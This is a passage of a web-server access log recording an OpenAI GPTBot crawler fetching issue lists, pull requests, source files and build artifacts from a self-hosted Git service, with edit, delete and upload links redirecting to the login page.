192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol" +[17/Feb/2026:18:49:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=nearduedate&state=open&type=all" +[17/Feb/2026:18:49:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastupdate&state=open&type=all" +[17/Feb/2026:18:49:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:18:49:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 9994] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=mostcomment&state=open&type=all" +[17/Feb/2026:18:49:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?state=open&type=all" [Client 74.7.227.38] [Length 9930] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls" +[17/Feb/2026:18:49:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:18:49:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10264] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:18:49:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.Notebook/OpcTest%20program%20by%20claude.md?display=rendered" [Client 74.7.227.38] [Length 15904] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/OpcTest%20program%20by%20claude.md" +[17/Feb/2026:18:49:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=latest&state=closed&type=all" +[17/Feb/2026:18:49:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:49:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" +[17/Feb/2026:18:49:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" +[17/Feb/2026:18:49:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" +[17/Feb/2026:18:49:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" +[17/Feb/2026:18:49:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" [Client 74.7.227.38] [Length 9861] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" +[17/Feb/2026:18:49:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" [Client 74.7.227.38] [Length 10645739] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" +[17/Feb/2026:18:49:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" [Client 74.7.227.38] [Length 1041] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" +[17/Feb/2026:18:49:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build" [Client 74.7.227.38] [Length 10101] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot" +[17/Feb/2026:18:49:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=source" [Client 74.7.227.38] [Length 16281] [Gzip 5.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:18:49:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/js/script.js?display=source" [Client 74.7.227.38] [Length 15147] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/js/script.js" +[17/Feb/2026:18:49:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/update_status.py?display=source" [Client 74.7.227.38] [Length 13234] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/update_status.py" +[17/Feb/2026:18:49:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:49:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:49:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:49:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10167] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&state=all&type=all" +[17/Feb/2026:18:49:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:49:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:18:49:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:18:49:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor" [Client 74.7.227.38] [Length 10883] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build" +[17/Feb/2026:18:49:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/build" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build" +[17/Feb/2026:18:49:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/build" +[17/Feb/2026:18:49:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot" [Client 74.7.227.38] [Length 10896] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build" +[17/Feb/2026:18:49:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/build" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build" +[17/Feb/2026:18:49:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/build" +[17/Feb/2026:18:49:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/GoldPilot/build" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build" +[17/Feb/2026:18:49:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/GoldPilot/build" +[17/Feb/2026:18:49:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build" [Client 74.7.227.38] [Length 9780] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build" +[17/Feb/2026:18:49:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:49:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:18:49:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9997] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:49:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&state=all&type=all" +[17/Feb/2026:18:49:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&project=-1&state=all&type=all" +[17/Feb/2026:18:49:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/GoldMonitor" [Client 74.7.227.38] [Length 9807] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor" +[17/Feb/2026:18:49:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/build/GoldMonitor" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor" +[17/Feb/2026:18:49:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/build/GoldMonitor" +[17/Feb/2026:18:49:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/AssetPilot" [Client 74.7.227.38] [Length 9794] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot" +[17/Feb/2026:18:49:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/build/AssetPilot" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot" +[17/Feb/2026:18:49:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/build/AssetPilot" +[17/Feb/2026:18:49:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/xref-AssetPilot.html" [Client 74.7.227.38] [Length 526372] [Gzip 19.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot" +[17/Feb/2026:18:49:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/GoldPilot/build/AssetPilot" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot" +[17/Feb/2026:18:49:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/GoldPilot/build/AssetPilot" +[17/Feb/2026:18:49:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" [Client 74.7.227.38] [Length 522609] [Gzip 19.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor" +[17/Feb/2026:18:49:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/build/AssetPilot" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot" +[17/Feb/2026:18:49:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/build/AssetPilot" +[17/Feb/2026:18:49:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/AssetPilot.pkg" [Client 74.7.227.38] [Length 11082] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot" +[17/Feb/2026:18:49:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PYZ-00.pyz" [Client 74.7.227.38] [Length 11101] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot" +[17/Feb/2026:18:49:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.pyz" [Client 74.7.227.38] [Length 11102] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor" +[17/Feb/2026:18:49:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/EXE-00.toc" [Client 74.7.227.38] [Length 23743] [Gzip 11.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot" +[17/Feb/2026:18:49:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" [Client 74.7.227.38] [Length 11087] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor" +[17/Feb/2026:18:49:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/GoldPilot/build/GoldMonitor" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor" +[17/Feb/2026:18:49:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/GoldPilot/build/GoldMonitor" +[17/Feb/2026:18:49:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" [Client 74.7.227.38] [Length 14489] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 